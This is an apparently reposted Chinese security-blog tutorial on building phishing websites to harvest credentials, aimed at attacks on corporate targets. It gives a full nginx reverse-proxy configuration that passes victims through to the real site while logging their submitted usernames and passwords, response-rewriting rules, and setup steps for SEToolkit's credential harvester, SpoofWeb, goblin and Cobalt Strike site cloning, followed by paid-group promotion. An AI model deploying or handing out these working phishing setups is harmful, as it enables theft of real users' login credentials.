钓鱼web!搭建方法【干货】
2023-3-31 22:10:11 Author: 渗透安全团队(查看原文) 阅读量:50 收藏

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

废话不多说,钓鱼YYDS,尤其是在对一些集团类型的攻击时,很好用

1、基于反向代理的钓鱼网站搭建

一个虚假的钓鱼网站比较容易被人发现,因为功能是不能正确使用的,即使你使用302重定向,动作也是非常明显的(虽然也可以用,效果也还行),但是基于反向代理的钓鱼网站搭建的话,你只是进行了一次中转,用户还是访问的是实际原来的服务器。

下载一个宝塔,宝塔可以让我们很方便的下载nginx

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh

记得放行端口

当然也可以直接安装

rm /usr/sbin/nginx
rm -rf /etc/nginx
apt-get remove nginx
apt-get remove nginx-full
apt-get update
apt-get install nginx-full

修改配置:

vim /www/server/nginx/conf/nginx.conf

修改点在16行,修改日志记录;74——79行,修改代理网站,自己看吧

cat /www/server/nginx/conf/nginx.conf

user  www www;
worker_processes auto;
error_log /www/wwwlogs/nginx_error.log crit;
pid /www/server/nginx/logs/nginx.pid;
worker_rlimit_nofile 51200;

events
{
use epoll;
worker_connections 51200;
multi_accept on;
}

http
{
log_format TestLog escape=json '$request $request_body $status ';

include mime.types;
#include luawaf.conf;

include proxy.conf;

default_type application/octet-stream;

server_names_hash_bucket_size 512;
client_header_buffer_size 32k;
large_client_header_buffers 4 32k;
client_max_body_size 50m;

sendfile on;
tcp_nopush on;

keepalive_timeout 60;

tcp_nodelay on;

fastcgi_connect_timeout 300;
fastcgi_send_timeout 300;
fastcgi_read_timeout 300;
fastcgi_buffer_size 64k;
fastcgi_buffers 4 64k;
fastcgi_busy_buffers_size 128k;
fastcgi_temp_file_write_size 256k;
fastcgi_intercept_errors on;

gzip on;
gzip_min_length 1k;
gzip_buffers 4 16k;
gzip_http_version 1.1;
gzip_comp_level 2;
gzip_types text/plain application/javascript application/x-javascript text/javascript text/css application/xml;
gzip_vary on;
gzip_proxied expired no-cache no-store private auth;
gzip_disable "MSIE [1-6]\.";

limit_conn_zone $binary_remote_addr zone=perip:10m;
limit_conn_zone $server_name zone=perserver:10m;

server_tokens off;
access_log off;

server
{
listen 8088;
server_name 81.68.xx.xx;
index index.html index.htm index.php index.jsp login.jsp index.aspx;
#root /www/server/phpmyadmin;

#error_page 404 /404.html;
include enable-php.conf;

location /{
proxy_pass https://106.75.xx.xx;
proxy_set_header Host 81.68.xx.xx;
proxy_set_header X-Forwarded-For $remote_addr;
}

access_log /www/wwwlogs/access.log TestLog;
}
include /www/server/panel/vhost/nginx/*.conf;
}

配置完重启

nginx -s reload

或者nginx -c /www/server/nginx/conf/nginx.conf

查看日志,发现成功记录了账户密码

但是经过测试,不是所有的网站都能copy,有的网站由于一些前端样式请求解析的问题,导致会出现乱码、404,等一些奇奇怪怪的问题,大概率是需要使用nginx的匹配替换JS,或者header头等,或是跨域访问问题

subs_filter 如

subs_filter_types   text/css text/plain application/x-javascript application/javascript;
subs_filter http:// 'https://';
subs_filter abc.org 'xyz.net';
subs_filter caoss.com 'css.net';//第一个参数是要被替换的,第二个参数是替换后
sub_filter_once off; //替换所有的,默认是on,替换第一个

2、SEToolkit

git clone https://github.com/trustedsec/social-engineer-toolkit.git
chmod 777 -R social-engineer-toolkit-master/
cd social-engineer-toolkit
python setup.py install

报了个错,但是他提示可以直接使用,后来踩坑pip3问题

填坑

apt-get remove python3-pip  删掉老的pip3
vim vim /etc/apt/sources.list
#加入以下内容
deb http://cn.archive.ubuntu.com/ubuntu bionic main multiverse restricted universe
deb http://cn.archive.ubuntu.com/ubuntu bionic-updates main multiverse restricted universe
deb http://cn.archive.ubuntu.com/ubuntu bionic-security main multiverse restricted universe
deb http://cn.archive.ubuntu.com/ubuntu bionic-proposed main multiverse restricted universe
sudo apt-get update
sudo apt-get install python3-pip
成功运行pip3
pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
python setup.py install

1、打开setoolkit

2、进入set后,直接盲选输入

1、2、3、2

分别对应

Social-Engineering Attacks    社会工程学

Website Attack Vectors     网站攻击

Credential Harvester Attack Method    凭据收割

Site Cloner  选择克隆的方式来构造

3、然后选择监听IP,选择克隆网站

怎么说呢,测试效果不尽人意吧,有时候存在各种各样的问题,有时候是可以成功使用的,作为教学的场景是够用的,如果是对于新人的话,还是可以用这个工具很好的演示钓鱼网站。

3、SpoofWeb

https://github.com/5icorgi/SpoofWeb

下载后发现格式为windows,修改格式为unix,sed -i "s/\r//"  PhishingWebSrv.sh

./PhishingWebSrv.sh     您的域名     Mysql的root密码(随意)         钓鱼页面URL.7z          解压密码

./PhishingWebSrv.sh  "sp.hi.org" '81PtmLoDdsi@#402njgJ4G'        "https://fileproxy.io/spoofpage.7z" "PaZahey873

这里手上暂时没钓鱼页面的URL源码,就暂时不复现了。

4、goblin  钓鱼网站生成

https://github.com/xiecat/goblin

目前来说比较成熟的一款生成

5、Cobaltstrike

最大的好处就是非常的方便

开启键盘记录器后,效果如下,就是方便,并且克隆出来的网站也比较逼真,偶尔翻车,但是不会很频繁

其他方法,使用WebCopy,Httrack将网站静态源码打包,然后再自行写点代码来对前端用户名密码进行保存,但是我觉得有点麻烦了。这两种工具更适合定制化场景,例如安服仔常做的工作“应急演练”。https://www.yuque.com/iceqaq/erzlyu/iqbvvc


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247502171&idx=1&sn=6b5e44929962bf91069028a7f18d6c6c&chksm=c17634f4f601bde268e37523a31e6465cc538f2d82a3fa3f6f36c65731d9f6785fdeb9ea107c#rd
如有侵权请联系:admin#unsafe.sh